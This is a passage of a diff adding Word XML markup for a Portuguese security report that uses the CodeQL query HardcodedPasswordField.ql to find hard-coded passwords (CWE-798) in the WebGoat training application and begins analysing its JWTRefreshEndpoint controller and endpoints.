+        <w:t>of</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Hard-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>coded</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>Credentials</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> – </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>CWE 798</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (A.4)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t xml:space="preserve">Para tal utilizou-se a QL </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>query</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> já construída no repositório </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>starter</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> kit</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>HardcodedPasswordField.ql</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (A.4.a). O resultado desta </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>query</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> foi o seguinte:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:noProof/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="481AE7F2" wp14:editId="0B2C0C2D">
+            <wp:extent cx="3917950" cy="1718941"/>
+            <wp:effectExtent l="19050" t="19050" r="25400" b="15240"/>
+            <wp:docPr id="138296155" name="Picture 1" descr="A screenshot of a computer screen&#10;&#10;AI-generated content may be incorrect."/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="138296155" name="Picture 1" descr="A screenshot of a computer screen&#10;&#10;AI-generated content may be incorrect."/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId13">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="3929040" cy="1723807"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:ln>
+                      <a:solidFill>
+                        <a:schemeClr val="tx1"/>
+                      </a:solidFill>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Caption"/>
+        <w:jc w:val="center"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Figura </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="begin"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:instrText xml:space="preserve"> SEQ Figura \* ARABIC </w:instrText>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="separate"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:noProof/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>6</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:fldChar w:fldCharType="end"/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> - Resultado da QL </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>query</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i w:val="0"/>
+          <w:iCs w:val="0"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>HardcodedPasswordField.ql</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="360"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Na figura 6 encontra-se o resultado da QL </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>query</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. É possível observar uma lista onde se encontram identificadas </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>hardcoded</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>passwords</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> presentes no código fonte da aplicação </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>WebGoat</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:numPr>
+          <w:ilvl w:val="2"/>
+          <w:numId w:val="1"/>
+        </w:numPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="9" w:name="_Toc213009136"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>Análise do código</w:t>
+      </w:r>
+      <w:bookmarkEnd w:id="9"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Ao clicar a segunda entrada na lista (A.4.b), encontramo-nos na classe </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>JWTRefreshEndpoint</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (ficheiro JWTRefreshEndpoint.java). Ao analisar o código, é possível compreender que esta classe </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>está</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> a ser utilizad</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>a</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> como um controlador da </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>framework</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>spring</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">De uma forma simplificada, esta </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>framework</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> permite declarar uma</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ou mais</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> classe</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> como um controlador que é responsável responder a pedidos HTTP e/ou HTTPS </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">em </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>endpoints</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> mapeados pelo próprio controlador através de anotações. Este controlador disponibiliza e gere os seguintes </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>endpoints</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>http://HOST:PORT/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>JWT/refresh/login</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>http://HOST:PORT/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>JWT/refresh/checkout</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="4"/>
+        </w:numPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t>http://HOST:PORT/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>JWT/refresh/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>newToken</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Esta </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">classe </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">utilizada também a </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>estrutura</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:b/>
+          <w:bCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>JWT</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> (JSON </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:i/>
+          <w:iCs/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Web </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
